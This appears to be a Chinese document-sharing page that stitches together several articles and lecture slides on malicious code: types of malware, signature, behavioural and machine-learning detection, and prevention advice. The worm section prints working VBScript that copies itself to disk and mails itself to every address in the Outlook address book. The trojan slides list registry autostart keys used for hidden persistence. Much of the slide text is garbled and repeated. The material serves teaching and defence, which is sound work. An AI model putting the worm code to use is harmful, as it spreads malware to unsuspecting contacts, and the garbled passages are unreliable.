恶意代码介绍及防范
- 格式:doc
- 大小:60.50 KB
- 文档页数:9
下载文档原格式
合集下载
网络安全中的恶意代码检测与防范方法
网络安全中的恶意代码检测与防范方法恶意代码(Malware)是指用于攻击计算机系统、窃取用户信息、传播病毒等恶意行为的计算机程序。
随着网络的普及和应用的广泛,恶意代码的威胁日益严重,对网络安全造成了巨大的风险。
为了保护用户信息和计算机系统的安全,网络安全专家们积极研发并应用恶意代码检测与防范方法。
恶意代码的检测方法主要包括特征检测、行为检测和机器学习检测。
特征检测是一种常见而有效的方法,它利用已知的恶意代码特征来识别和分类恶意代码。
这些特征可以是恶意代码的特定字符串、文件结构或者函数调用等。
特征检测不依赖于恶意代码的行为,而是依赖于恶意代码的特定特征。
然而,特征检测的局限在于对已知特征的依赖,新型的恶意代码可能会使用新的特征,从而逃避检测。
行为检测是通过观察恶意代码的行为来判断其是否为恶意代码。
这种方法不依赖于恶意代码的特定特征,而是关注其对计算机系统的影响和操作。
行为检测可以监控恶意代码执行的系统调用、网络通信等行为,从而及时发现和阻止恶意代码的活动。
然而,行为检测也有其局限性,因为某些新型的恶意代码可以通过伪装、加密等手段来隐藏其行为特征,使得其难以被检测。
机器学习是一种基于样本数据的自动学习方法,其在恶意代码检测中也得到了广泛应用。
机器学习方法通过分析已有的恶意代码数据和非恶意代码数据,学习生成一个分类模型。
这个模型可以对新的恶意代码进行预测和分类。
机器学习方法能够自动学习具有较强泛化能力的特征,对于新型的恶意代码也能较好地进行检测。
但是,机器学习方法也存在着过拟合、样本不平衡等问题,需要针对这些问题进行优化。
除了恶意代码的检测方法,防范恶意代码也是非常重要的。
下面我来介绍几种常用的防范恶意代码的方法。
首先是使用杀毒软件。
杀毒软件是一种能够检测和消除计算机病毒的软件。
它通过对病毒特征的识别和监听计算机的活动,及时发现和清除恶意代码。
用户可以定期更新杀毒软件的病毒库,确保其具备最新的恶意代码识别能力。
预防恶意代码的防范手段
预防恶意代码的防范手段
恶意代码是指那些具有恶意的计算机程序,它们的目的是获取机密信息、破坏系统安全、盗取账户密码等,对个人和企业的财产和声誉造成威胁。
为了保护自己的计算机系统和数据安全,我们需要采取以下措施来预防恶意代码的攻击:
1.安装杀毒软件:杀毒软件可以及时发现和清除恶意代码,防止恶意程序危害我们的系统。
因此,我们应该定期更新杀毒软件的病毒库,确保杀毒软件的实时保护功能处于开启状态。
2.勿轻信邮件或短信链接:恶意代码往往通过邮件或短信中的链接传播,一旦我们点击了这些链接,恶意代码就会潜入我们的计算机系统。
因此,我们应该谨慎对待未知来源的邮件或短信,不要轻信其中的链接。
3.更新操作系统和软件:不少恶意代码利用系统和软件漏洞来攻击我们的计算机系统,因此我们应该定期更新操作系统和软件,确保系统和软件的漏洞得到及时修补。
4.使用防火墙保护网络安全:防火墙可以防止恶意程序通过网络攻击我们的计算机系统,因此我们应该在计算机上安装防火墙,并且合理配置防火墙的规则。
5.备份数据:恶意代码往往会破坏我们的数据,因此我们应该定期备份重要数据,以防恶意代码攻击导致数据丢失。
综上所述,预防恶意代码的攻击需要我们采取多种手段,包括安装杀毒软件、谨慎对待邮件和短信链接、更新操作系统和软件、使用
防火墙保护网络安全以及备份数据等。
只有通过综合防范,我们才能有效地预防恶意代码的攻击,保障我们的计算机系统和数据安全。
恶意代码防范与检测
原理篇什么是恶意代码?计算机病毒蠕虫(Worm)和特洛伊木马(Trojan Horse)等。
Trojan Horse等恶意代码的危害计算机病毒传染性、依附性蠕虫独立的程序木马与病毒的区别:病毒主要特殊性是能自我复具有传染性和破坏性病毒木马与远程控制软件的区别:远程控制软件是在被控制的制,具有传染性和破坏性。
病毒的传染是没有可控性的传染,即使是病毒编制者也可能无法对其它以自我复制的方式目标系统知道和允许的情况下对目标系统进行远程控制的客户/服务器软件,控制通常不具有隐蔽进行控制,它以自我复制的方式进行繁殖和感染文件。
木马的特殊性是木马攻击者具有控性和破坏性,而木马恰恰相反。
远程控制软件是“善意”的控制,是为管理或应用服务的。
而木马则是“恶意”的控制目能够对木马实施控制,具有可控性。
而木马则是“恶意”的控制,目的是对目标系统执行恶意操作或窃取信息。
特洛伊木马的结构特洛伊木马的基本特性–隐蔽性特洛伊木马的植入手段木马线方木马上线通知方法木马启动方式的隐蔽技术-利用注册表启动项隐蔽启动利用注表文件关联项进行隐蔽启动1. 利用注册表隐蔽启动-利用注册表文件关联项进行隐蔽启动2. 插入文件中或与其它文件捆绑在一起隐蔽启动--常见 3. 利用特定的系统文件或其它一些特殊方式隐蔽启动修改文件关联冰河HKEY_CLASSES_ROOTHKEY CLASSES ROOTC:/windows/notepad.exe %1C: /windows/system/Sysexplr.exe %1注:利用注册表文件关联项进行隐蔽启动Windows\\CurrentVersionCurrentVersion\\Microsoft\\WindowsHKEY_LOCAL_MACHINE\\MicrosoftHKEY_LOCAL_MACHINERun :RunOnce :RunServices :RunServicesOnce :添加键值(一般是在Run中),这样使得 在很多黑客木马软件中,常常在这里在很多黑客木马软件中,常常在这里添加键值(一般是在常常在这里常常在这里添加键值(一般是在中)这样使得木马软件可以随着windows启动而启动并且很隐秘。
恶意代码介绍及防范
恶意代码介绍及防范
恶意代码,也称为恶意软件,是指被设计出来用于入侵、破坏、干扰、篡改或者窃取信息等不法目的的计算机程序。
恶意代码可以包括计算机病毒、木马、蠕虫、间谍软件、广告软件等各种形式。
恶意代码的威胁性非常大,它可以对计算机系统和网络造成严重的破
坏和泄露。
举例来说,计算机病毒可以通过感染其他文件或者程序来破坏
数据文件或者系统文件,造成计算机崩溃;木马可以通过远程控制计算机,窃取用户的敏感信息、银行账号密码等;间谍软件可以监控用户的计算机
活动,偷窃用户的隐私等。
为了防范恶意代码的攻击,我们可以采取以下几个方面的措施:
3.不随便点击链接和打开附件:不轻易点击不明链接,尤其是来自未
知的邮件、社交媒体等。
同时,在打开附件前先进行杀毒扫描,确保附件
没有恶意代码。
4.定期更新系统和软件:及时安装系统和软件的补丁和更新,以修复
存在的漏洞,减少恶意代码攻击的机会。
5.注意网络安全教育和优化:定期进行网络安全教育,提高用户的安
全防范意识。
同时,优化系统设置、配置强密码、定期备份数据等也是有
效的防范措施。
6.使用加密技术和安全传输协议:在敏感信息传输中使用加密技术和
安全传输协议,确保数据在传输过程中不被窃取或篡改。
7.使用虚拟机和沙盒环境:在不信任的环境中,可以使用虚拟机或者
沙盒环境来运行潜在的恶意软件,以隔离它们对系统的影响。
总之,防范恶意代码的攻击是一个持续的过程,需要我们不断提高安全防范意识,采取多层次的措施来保护个人和企业的计算机系统和数据安全。
同时,合理使用互联网和计算机,并及时更新相关防护措施也是非常重要的。
恶意代码安全攻防
恶意代码安全攻防1. 实践内容1.1 恶意代码1.1.1 定义与分类定义:计算机按照攻击者的意图执⾏以达到恶意⽬标的指令集。
分类:计算机病毒、蠕⾍、恶意移动代码、后门、特洛伊⽊马、僵⼫程序、内核套件,融合型恶意代码。
计算机病毒:通过感染⽂件进⾏传播,能⾃我复制,需要⼈为⾏动或被执⾏。
蠕⾍:⾃主运⾏,主动扫描。
恶意移动代码:从远程主机下载并在本地执⾏的轻量级程序,较⾼⾃主性。
后门:绕过正常的安全机制,直接控制主机。
特洛伊⽊马:伪装的恶意软件。
僵⼫⽹络:传播恶意代码控制多台主机,实施⼀对多控制。
rootkit:修改⽤户态软件或内核,执⾏时获取root。
1.1.2 计算机病毒通过拷贝⾃⾝嵌⼊系统程序感染主机。
基本特性:感染性、潜伏性、可触发性、破坏性、衍⽣性。
潜在感染⽬标及机制:1. 可执⾏⽂件;前缀感染机制,拷贝在宿主程序的始端,执⾏宿主程序时⾸先运⾏病毒代码;后缀感染机制,拷贝在宿主程序的末端,通过跳转指令控制代码运⾏;插⼊感染机制,拷贝在宿主程序中间。
2. 感染引导扇区( 主引导区和分区引导区);感染引导区上的引导记录,在系统启动时先于操作系统截取系统控制权。
3. 宏指令数据⽂件:以宏指令的⽅式拷贝到⽬标中,造成感染。
1.1.3 ⽹络蠕⾍通过⽹络⾃主传播、⾃我复制,没必要感染宿主。
组成结构:1. 弹头:渗透代码,利⽤诸如⽹络服务,⽂件传输服务上的系统漏洞以获取主机访问权。
2. 传播引擎:通过弹头装载⾃⾝拷贝写⼊系统或通过在系统中利⽤⽹络⽂件传输服务加载⾃⾝拷贝。
3. ⽬标选择算法和扫描引擎:查找新⽬标,通过不同⽬标,如电⼦邮件地址、主机列表、被信任的系统选择相应算法确定⽬标地址。
4. 有效载荷:附加的攻击代码,如安装后门、或利⽤资源执⾏复杂计算。
1.1.4 僵⼫程序与僵⼫⽹络功能结构:1. 主体功能:命令控制模块和传播模块,⽤于僵⼫⽹络的控制和僵⼫陈旭的传播。
2. 辅助功能:信息窃取模块、主机控制模块、下载更新模块、防分析检测。
网络安全中的恶意代码检测与防范
网络安全中的恶意代码检测与防范一、恶意代码的概念与特征恶意代码(Malware)是一种破坏性的软件,它会在用户不知情的情况下进入计算机系统,通过窃取信息、破坏文件、占用系统资源等方式对用户造成伤害。
目前常见的恶意代码包括病毒(Virus)、蠕虫(Worm)、木马(Trojan horse)、间谍软件(Spyware)等。
这些恶意软件会利用漏洞或者用户的不当行为来攻击用户的计算机系统。
例如,用户不小心点击了一个恶意链接或者下载了一个感染了病毒的程序,都有可能导致计算机系统遭到破坏。
恶意代码的特征包括潜在性、不可预测性、变异性和传染性。
其中,变异性是恶意代码最为致命的特征之一。
由于恶意代码的变异性比较强,导致传统的恶意代码检测技术失效。
因此,基于行为的恶意代码检测技术逐渐应用广泛。
二、恶意代码检测技术(一)基于签名的恶意代码检测基于签名的恶意代码检测是一种传统的检测技术,它通过比对已知的恶意代码的特征(即病毒特征库)和目标文件的特征来识别恶意代码。
如果目标文件的特征与病毒特征库中的恶意代码匹配,那么该目标文件就被认为是恶意的。
基于签名的恶意代码检测技术的优点是准确性高、误报率低,但其缺点是无法检测出新出现的恶意代码。
(二)基于行为的恶意代码检测随着恶意代码的变异性不断增强,基于签名的恶意代码检测技术的局限性日益显现。
与此同时,基于行为的恶意代码检测技术逐渐成为了主流。
基于行为的恶意代码检测技术直接针对恶意代码的行为特征进行监测,从而判断该程序是否为恶意代码。
例如,当一个程序在计算机上执行某些恶意行为,例如窃取用户的个人信息或占用计算机资源时,基于行为的恶意代码检测技术会自动识别出来。
基于行为的恶意代码检测技术的优点是可适应新兴的恶意代码,但其缺点是误报率较高。
三、恶意代码防范措施(一)注意网络安全意识有一个好的网络安全意识可以更好地保护自己的计算机系统。
用户应该牢记的是,不要轻易打开陌生邮件、不要随便点击任何链接,并且不要轻易下载未知来源的程序,以避免受到恶意代码的攻击。
网络安全中的恶意代码分析与防范手段
网络安全中的恶意代码分析与防范手段恶意代码是指通过计算机网络对用户或者系统造成危害的一种程序代码,常见的恶意代码包括病毒、蠕虫、木马、间谍软件等。
随着网络的普及和应用的广泛,网络安全问题变得愈发突出。
本文将对网络安全中的恶意代码进行分析,并提供相应的防范手段。
一、恶意代码的分析恶意代码的形式多种多样,具有隐蔽性和破坏性。
下面将介绍几种常见的恶意代码及其分析方法。
1. 病毒病毒是一种能够自我复制并传播的恶意代码。
它通常通过文件的共享或者下载、运行来感染目标计算机。
病毒可以对系统文件进行修改、删除或者破坏,导致计算机系统崩溃。
分析病毒需要使用杀毒软件,对潜在的病毒样本进行扫描和分析,从而识别病毒的特征。
2. 蠕虫蠕虫是一种能够自动复制并在网络中传播的恶意代码。
蠕虫可以通过漏洞来感染系统,并在系统中运行。
它们常常通过邮件、用户点击等方式传播。
分析蠕虫需要借助网络监控系统,对网络流量进行监测和分析,从而发现异常的数据包和行为。
3. 木马木马是一种通过伪装成合法程序隐藏在计算机系统中的恶意代码。
它可以远程控制受感染的计算机,进行非法操作,如窃取个人信息、植入其他恶意程序等。
分析木马需要使用流量分析工具,监控计算机与外部的网络连接,识别异常连接和传输的数据包。
4. 间谍软件间谍软件是一种潜伏在计算机中的恶意程序,用于收集用户的个人信息,并将其发送给第三方。
间谍软件通常通过下载和安装一些看似正常的软件而进入系统。
分析间谍软件可以使用反间谍软件进行扫描和识别,同时注意检查系统中的异常行为和网络连接。
二、恶意代码的防范手段针对恶意代码的分析结果,我们需要采取相应的防范措施,并提高网络安全的水平。
以下是几种常用的防范手段。
1. 使用杀毒软件和防火墙杀毒软件和防火墙是防范恶意代码的第一道防线。
及时更新病毒库和漏洞补丁,可以有效阻止恶意代码的感染。
同时,配置合适的防火墙策略,对网络连接和传输进行监控和过滤,保护系统安全。
恶意代码检测与防范技术ppt课件
恶意代码刚出现时发展较慢,但是随着网络飞速发展,Internet 成为恶意代码发布并快速蔓延的平台。特别是过去5 年,不断涌现的 恶意代码,证实了这一点。 3)从病毒到电子邮件蠕虫,再到利用系统漏洞主动攻击的恶意代码
恶意代码的早期,大多数攻击行为是由病毒和受感染的可执行文 件引起的。然而,在过去5 年,利用系统和网络的脆弱性进行传播和 感染开创了恶意代码的新纪元。
火灾袭来时要迅速疏散逃生,不可蜂 拥而出 或留恋 财物, 要当机 立断, 披上浸 湿的衣 服或裹 上湿毛 毯、湿 被褥勇 敢地冲 出去
11.1 常见的恶意代码
1. 恶意代码概述
代码是指计算机程序代码,可以被执行完成特定功能。任何事物 都有正反两面,人类发明的所有工具既可造福也可作孽,这完全取 决于使用工具的人。
指一段嵌入计算机系统程序的,通过特殊的数据或时间作为 条件触发,试图完成一定破坏功能的程序。
潜伏、传染和 破坏
扫描、攻击和扩 散
欺骗、隐蔽和信 息窃取 潜伏和破坏 Nhomakorabea病菌
指不依赖于系统软件,能够自我复制和传播,以消耗系统资 源为目的的程序。
用户级RootKit
指通过替代或者修改被系统管理员或普通用户执行的程序进 入系统,从而实现隐藏和创建后门的程序。
意代码入侵的途径很多,比如,从互联网下载的程序本身就可能含有恶 意代码;接收已感染恶意代码的电子邮件;从光盘或软盘往系统上安装 软件;黑客或攻击者故意将恶意代码植入系统等。
② 维持或提升现有特权。恶意代码的传播与破坏必须盗用用户或者
进程的合法权限才能完成。
③ 隐蔽策略。为了不让系统发现恶意代码已经侵入系统,恶意代码
核心级RootKit 指嵌入操作系统内核进行隐藏和创建后门的程序
恶意代码的早期,大多数攻击行为是由病毒和受感染的可执行文 件引起的。然而,在过去5 年,利用系统和网络的脆弱性进行传播和 感染开创了恶意代码的新纪元。
火灾袭来时要迅速疏散逃生,不可蜂 拥而出 或留恋 财物, 要当机 立断, 披上浸 湿的衣 服或裹 上湿毛 毯、湿 被褥勇 敢地冲 出去
11.1 常见的恶意代码
1. 恶意代码概述
代码是指计算机程序代码,可以被执行完成特定功能。任何事物 都有正反两面,人类发明的所有工具既可造福也可作孽,这完全取 决于使用工具的人。
指一段嵌入计算机系统程序的,通过特殊的数据或时间作为 条件触发,试图完成一定破坏功能的程序。
潜伏、传染和 破坏
扫描、攻击和扩 散
欺骗、隐蔽和信 息窃取 潜伏和破坏 Nhomakorabea病菌
指不依赖于系统软件,能够自我复制和传播,以消耗系统资 源为目的的程序。
用户级RootKit
指通过替代或者修改被系统管理员或普通用户执行的程序进 入系统,从而实现隐藏和创建后门的程序。
意代码入侵的途径很多,比如,从互联网下载的程序本身就可能含有恶 意代码;接收已感染恶意代码的电子邮件;从光盘或软盘往系统上安装 软件;黑客或攻击者故意将恶意代码植入系统等。
② 维持或提升现有特权。恶意代码的传播与破坏必须盗用用户或者
进程的合法权限才能完成。
③ 隐蔽策略。为了不让系统发现恶意代码已经侵入系统,恶意代码
核心级RootKit 指嵌入操作系统内核进行隐藏和创建后门的程序
5-1恶意代码攻击和防御
第三代
第四代
第五代
传统的远程控制步骤
如何远程植入程序
直接攻击 电子邮件
经过伪装的木马 被植入目标机器
文件下载
浏览网页
合并文件
&件名。如把.exe改变成.jpg.exe。 其次更改文件图标。一般木马本身没有图标,系 统会显示一个windows预设的图标。 合并程序欺骗 将木马与一个正常的文件捆绑为一个文件。例如 WinRAR可实现。 伪装成应用程序扩展组件 此类属于最难识别的木马。如伪装成.dll,.ocx等, 挂在一个知名的软件中。
注册表启动
Run键
这是最常用的注册表启动方法,在Run键下面的所有程序在用户每次登 陆后都会自动执行,其键位置如下: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVer sion\Run; HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion \Run; RunOnce键 RunOnce键只在用户首次登陆时才运行,其键位置如下: HKEY_LOCAL_MACHINE\ SOFTWARE \Microsoft\Windows\CurrentVersion\RunOnce; RunOnceEx键 这个键值只有windows XP和windows 2003才有,也可以实现自启动: HKEY_ LOCAL _MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx;
第五章 恶意代码攻 击和防御
1 概述
什么是恶意代码?
恶意代码是指独立的程序或者嵌入到其它程序中的代码, 它在不被用户察觉的情况下启动,达到破坏电脑安全性和 完整性的目的。
恶意代码检测与防范技术
点),这种针对性充分说明了恶意代码正是利用软件的脆弱性实就是利用
邮件系统的脆弱性作为其入侵的最初突破点的。
11.2 恶意代码机理
1. 恶意代码的相关定义
恶意代码类型 计算机病毒 定义 指编制或者在计算机程序中插入的破坏计算机功能或者毁坏 数据,影响计算机使用,并能自我复制的一组计算机指令或 者程序代码。 指通过计算机网络自我复制,消耗系统资源和网络资源的程 序 指一种与远程计算机建立连接,使远程计算机能够通过网络 控制本地计算机的程序。 指一段嵌入计算机系统程序的,通过特殊的数据或时间作为 条件触发,试图完成一定破坏功能的程序。 指不依赖于系统软件,能够自我复制和传播,以消耗系统资 源为目的的程序。 指通过替代或者修改被系统管理员或普通用户执行的程序进 入系统,从而实现隐藏和创建后门的程序。 特点 潜伏、传染和 破坏 扫描、攻击和扩 散 欺骗、隐蔽和信 息窃取 潜伏和破坏 传染和拒绝服务 隐蔽,潜伏 隐蔽,潜伏
11
第11章 恶意代码检测与防范技术
11.1 11.2
常见的恶意代码 恶意代码机理 恶意代码分析
11.3 11.4
恶意代码预防
11.1 常见的恶意代码
1. 恶意代码概述
代码是指计算机程序代码,可以被执行完成特定功能。任何事 物都有正反两面,人类发明的所有工具既可造福也可作孽,这完全 取决于使用工具的人。
计算机蠕虫 特洛伊木马
逻辑炸弹
病菌 用户级RootKit
核心级RootKit 指嵌入操作系统内核进行隐藏和创建后门的程序
11.1 常见的恶意代码
–2001年,国信安办与公安部共同主办了我国首次计算机病毒 疫情网上调查工作。结果感染过计算机病毒的用户高达63%, 其中感染三次以上的用户占59%多,网络安全存在大量隐患。 –2001年 8 月,“红色代码”蠕虫利用微软 Web 服务器 IIS4.0 或 5.0 中 Index 服务的安全漏洞,攻破目标机器,并通过自 动扫描方式传播蠕虫,在互联网上大规模泛滥。 –2003年,SLammer蠕虫在10 分钟内导致互联网90%脆弱主机 受到感染。同年8月,“冲击波”蠕虫爆发,8天内导致全球 电脑用户损失高达20亿美元之多。 –2004年到2006年,振荡波蠕虫、爱情后门、波特后门等恶意 代码利用电子邮件和系统漏洞对网络主机进行疯狂传播,给 国家和社会造成了巨大的经济损失。请见图11.1。
邮件系统的脆弱性作为其入侵的最初突破点的。
11.2 恶意代码机理
1. 恶意代码的相关定义
恶意代码类型 计算机病毒 定义 指编制或者在计算机程序中插入的破坏计算机功能或者毁坏 数据,影响计算机使用,并能自我复制的一组计算机指令或 者程序代码。 指通过计算机网络自我复制,消耗系统资源和网络资源的程 序 指一种与远程计算机建立连接,使远程计算机能够通过网络 控制本地计算机的程序。 指一段嵌入计算机系统程序的,通过特殊的数据或时间作为 条件触发,试图完成一定破坏功能的程序。 指不依赖于系统软件,能够自我复制和传播,以消耗系统资 源为目的的程序。 指通过替代或者修改被系统管理员或普通用户执行的程序进 入系统,从而实现隐藏和创建后门的程序。 特点 潜伏、传染和 破坏 扫描、攻击和扩 散 欺骗、隐蔽和信 息窃取 潜伏和破坏 传染和拒绝服务 隐蔽,潜伏 隐蔽,潜伏
11
第11章 恶意代码检测与防范技术
11.1 11.2
常见的恶意代码 恶意代码机理 恶意代码分析
11.3 11.4
恶意代码预防
11.1 常见的恶意代码
1. 恶意代码概述
代码是指计算机程序代码,可以被执行完成特定功能。任何事 物都有正反两面,人类发明的所有工具既可造福也可作孽,这完全 取决于使用工具的人。
计算机蠕虫 特洛伊木马
逻辑炸弹
病菌 用户级RootKit
核心级RootKit 指嵌入操作系统内核进行隐藏和创建后门的程序
11.1 常见的恶意代码
–2001年,国信安办与公安部共同主办了我国首次计算机病毒 疫情网上调查工作。结果感染过计算机病毒的用户高达63%, 其中感染三次以上的用户占59%多,网络安全存在大量隐患。 –2001年 8 月,“红色代码”蠕虫利用微软 Web 服务器 IIS4.0 或 5.0 中 Index 服务的安全漏洞,攻破目标机器,并通过自 动扫描方式传播蠕虫,在互联网上大规模泛滥。 –2003年,SLammer蠕虫在10 分钟内导致互联网90%脆弱主机 受到感染。同年8月,“冲击波”蠕虫爆发,8天内导致全球 电脑用户损失高达20亿美元之多。 –2004年到2006年,振荡波蠕虫、爱情后门、波特后门等恶意 代码利用电子邮件和系统漏洞对网络主机进行疯狂传播,给 国家和社会造成了巨大的经济损失。请见图11.1。
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
目录一、蠕虫病毒概述 (2)1、蠕虫病毒的定义 (2)2、蠕虫病毒分类及特点 (2)二、蠕虫病毒分析和防范 (2)1、利用系统漏洞的恶性蠕虫病毒分析 (3)2、对个人用户产生直接威胁的蠕虫病毒 (3)3、个人用户对蠕虫病毒的防范措施 (4)三、特洛伊木马攻击步骤 (5)1、配置木马 (5)2、传播木马 (5)3、运行木马 (6)四、杀毒软件 (7)1、天网防火墙 (7)2、卡巴斯基 (8)3、Windows流氓软件清理大师 (8)参考文献 (8)恶意代码介绍及防范一、蠕虫病毒概述1、蠕虫病毒的定义计算机病毒自出现之日起,就成为计算机的一个巨大威胁,而当网络迅速发展的时候,蠕虫病毒引起的危害开始显现!从广义上定义,凡能够引起计算机故障,破坏计算机数据的程序统称为计算机病毒。
所以从这个意义上说,蠕虫也是一种病毒!但是蠕虫病毒和一般的病毒有着很大的区别。
对于蠕虫,现在还没有一个成套的理论体系,一般认为,蠕虫是一种通过网络传播的恶性病毒,它具有病毒的一些共性,如传播性,隐蔽性,破坏性等等,同时具有自己的一些特征,如不利用文件寄生(有的只存在于内存中),对网络造成拒绝服务,以及和黑客技术相结合等等!2、蠕虫病毒分类及特点根据使用者情况可将蠕虫病毒分为2类,一种是面向企业用户和局域网而言,这种病毒利用系统漏洞,主动进行攻击,可以对整个互联网可造成瘫痪性的后果!以“红色代码”,“尼姆达”,以及最新的“蠕虫王”为代表。
另外一种是针对个人用户的,通过网络(主要是Email,恶意网页形式)迅速传播的蠕虫病毒,以爱虫病毒,求职信病毒为例。
在这两类中,第一类具有很大的主动攻击性,而且爆发也有一定的突然性,但相对来说,查杀这种病毒并不是很难。
第二种病毒的传播方式比较复杂和多样,少数利用了微软的应用程序的漏洞,更多的是利用社会工程学对用户进行欺骗和诱使,这样的病毒造成的损失是非常大的,同时也是很难根除的。
蠕虫病毒一般不采取利用pe格式插入文件的方法,而是复制自身在互联网环境下进行传播,病毒的传染能力主要是针对计算机内的文件系统而言,而蠕虫病毒的传染目标是互联网内的所有计算机。
局域网条件下的共享文件夹,电子邮件Email,网络中的恶意网页,大量存在着漏洞的服务器等都成为蠕虫病毒传播的良好途径。
网络的发展也使得蠕虫病毒可以在几个小时内蔓延全球!可以预见,二、蠕虫病毒分析和防范蠕虫病毒往往能够利用漏洞,这里的漏洞或者说是缺陷,我们分为2种,软件上的缺陷和人为上的缺陷。
软件上的缺陷,如远程溢出,微软IE和Outlook 的自动执行漏洞等等,需要软件厂商和用户共同配合,不断的升级软件。
而人为的缺陷,主要是指的是计算机用户的疏忽。
这就是所谓的社会工程学(Social Engineering),当收到一封邮件带着病毒的求职信邮件时候,大多数人都会好奇去点击的。
对于企业用户来说,威胁主要集中在服务器和大型应用软件的安全上,而个人用户而言,主要是防范第二种缺陷。
1、利用系统漏洞的恶性蠕虫病毒分析在这种病毒中,以红色代码、尼姆达和SQL蠕虫为代表!他们共同的特征是利用微软服务器和应用程序组件的某个漏洞进行攻击,由于网上存在这样的漏洞比较普遍,使得病毒很容易传播!而且攻击的对象大都为服务器,所以造成的网络堵塞现象严重!其实蠕虫病毒本身除了对网络产生拒绝服务攻击外,并没有别的破坏措施。
但如果病毒编写者在编写病毒的时候加入破坏代码,后果将不堪设想!2、对个人用户产生直接威胁的蠕虫病毒对于个人用户而言,威胁大的蠕虫病毒采取的传播方式一般为电子邮件(Email)以及恶意网页等等!对于利用Email传播得蠕虫病毒来说,通常利用的是社会工程学(Social Engineering),即以各种各样的欺骗手段那诱惑用户点击的方式进行传播!恶意网页确切的讲是一段黑客破坏代码程序,它内嵌在网页中,当用户在不知情的情况下打开含有病毒的网页时,病毒就会发作。
这种病毒代码镶嵌技术的原理并不复杂,所以会被很多心怀不良企图者所利用,此外在很多黑客网站竟然有关于用网页进行破坏的技术论坛,并提供破坏程序代码下载,从而造成恶意网页的大面积泛滥,也使越来越多的用户遭受损失。
对于恶意网页,常常采取VB script和java script编程的形式!由于编程方式十分的简单,所以在网上非常的流行!VB script和java script是由微软操作系统的WSH(Windows Scripting HostWindows 脚本主机)解析并执行的,由于其编程非常简单,所以此类脚本病毒在网上疯狂传播,曾经疯狂一时的爱虫病毒就是一种VB script脚本病毒,然后伪装成邮件附件诱惑用户点击运行,更为可怕的是,这样的病毒是以源代码的形式出现的,只要懂得一点关于脚本编程的人就可以修改其代码,形成各种各样的变种。
下面以一个简单的脚本为例:Set objFs=CreateObject (“Scripting.FileSystemObject”)(创建一个文件系统对象)objFs.CreateTextFile ("C:\virus.txt",1)(通过文件系统对象的方法创建了TXT文件)如果我们把这两句话保存成为.vbs的VB脚本文件,点击就会在C盘中创建一个TXT文件了。
倘若我们把第二句改为:objFs.GetFile (WScript.ScriptFullName).Copy ("C:\virus.vbs")就可以将自身复制到C盘virus.vbs这个文件。
本句前面是打开这个脚本文件,WScript.ScriptFullName指明是这个程序本身,是一个完整的路径文件名。
GetFile函数获得这个文件,Copy函数将这个文件复制到C盘根目录下virus.vbs这个文件。
这么简单的两句就实现了自我复制的功能,已经具备病毒的基本特征——自我复制能力。
此类病毒往往是通过邮件传播的,在VB script中调用邮件发送功能也非常的简单,病毒往往采用的方法是向Outlook中的地址薄中的邮件地址发送带有包含自身的邮件来达到传播目的,一个简单的实例如下:Set objOA=Wscript.CreateObject ("Outlook.Application")(创建一个OUTLOOK应用的对象)Set objMapi=objOA.GetNameSpace ("MAPI")(取得MAPI名字空间)For i=1 to objMapi.AddressLists.Count(遍历地址簿)Set objAddList=objMapi.AddressLists (i)For j=1 To objAddList. AddressEntries.CountSet objMail=objOA.CreateItem (0)objMail.Recipients.Add (objAddList. AddressEntries (j))(取得收件人邮件地址)objMail.Subject="你好!" (设置邮件主题,这个往往具有很大的诱惑性)objMail.Body="这次给你的附件,是我的新文档!" (设置信件内容)objMail.Attachments.Add (“c:\virus.vbs")(把自己作为附件扩散出去)objMail.Send(发送邮件)nextnextSet objMapi=Nothing(清空objMapi变量,释放资源)set objOA=Nothing(清空objOA变量)这一小段代码的功能是向地址簿中的用户发送电子邮件,并将自己作为附件扩散出去。
这段代码中的第一行是创建一个Outlook的对象,是必不可少的。
在其下是一个循环,在循环中不断地向地址簿中的电子邮件地址发送内容相同的信件。
这就是蠕虫的传播性。
由此可以看出,利用VB script编写病毒是非常容易的,这就使得此类病毒的变种繁多,破坏力极大,同时非常难以根除的!3、个人用户对蠕虫病毒的防范措施通过上述的分析,我们可以知道,病毒并不是非常可怕的,网络蠕虫病毒对个人用户的攻击主要还是通过社会工程学,而不是利用系统漏洞!所以防范此类病毒需要注意以下几点:(1)使用合适的杀毒软件!在杀毒软件市场上,赛门铁克公司的Norton系列杀毒软件在全球具有很大的比例!经过多项测试,Norton杀毒系列软件脚本和蠕虫阻拦技术能够阻挡大部分电子邮件病毒,而且对网页病毒也有相当强的防范能力!目前国内的杀毒软件也具有了相当高的水平。
像瑞星,kv系列等杀毒软件,在杀毒软件的同时整合了防火强功能,对蠕虫兼木马程序有很大克制作用。
(2)经常升级病毒库,杀毒软件对病毒的查杀是以病毒的特征码为依据的,而病毒每天都层出不穷,尤其是在网络时代,蠕虫病毒的传播速度快,变种多,所以必须随时更新病毒库,以便能够查杀最新的病毒!(3)提高防杀毒意识。
不要轻易去点击陌生的站点,有可能里面就含有恶意代码!当运行IE时,点击“工具→Internet选项→安全→ Internet区域的安全级别”,把安全级别由“中”改为“高” 。
因为这一类网页主要是含有恶意代码的ActiveX或Applet、 JavaScript的网页文件,所以在IE设置中将ActiveX 插件和控件、Java脚本等全部禁止就可以大大减少被网页恶意代码感染的几率。
(4)不随意查看陌生邮件,尤其是带有附件的邮件,由于有的病毒邮件能够利用IE和Outlook的漏洞自动执行,所以计算机用户需要升级IE和Outlook 程序,及常用的其他应用程序!三、特洛伊木马攻击步骤用木马这种黑客工具进行网络入侵,从过程上看大致可分为六步,下面我们就按这六步来详细阐述木马的攻击原理。
1、配置木马一般来说一个设计成熟的木马都有木马配置程序,从具体的配置内容看,主要是为了实现以下两方面功能:(1)木马伪装:木马配置程序为了在服务端尽可能好的隐藏木马,会采用多种伪装手段,如修改图标、捆绑文件、定制端口、自我销毁等等。
(2)信息反馈:木马配置程序将就信息反馈的方式或地址进行设置,如设置信息反馈的邮件地址、IRC号、ICQ号等。
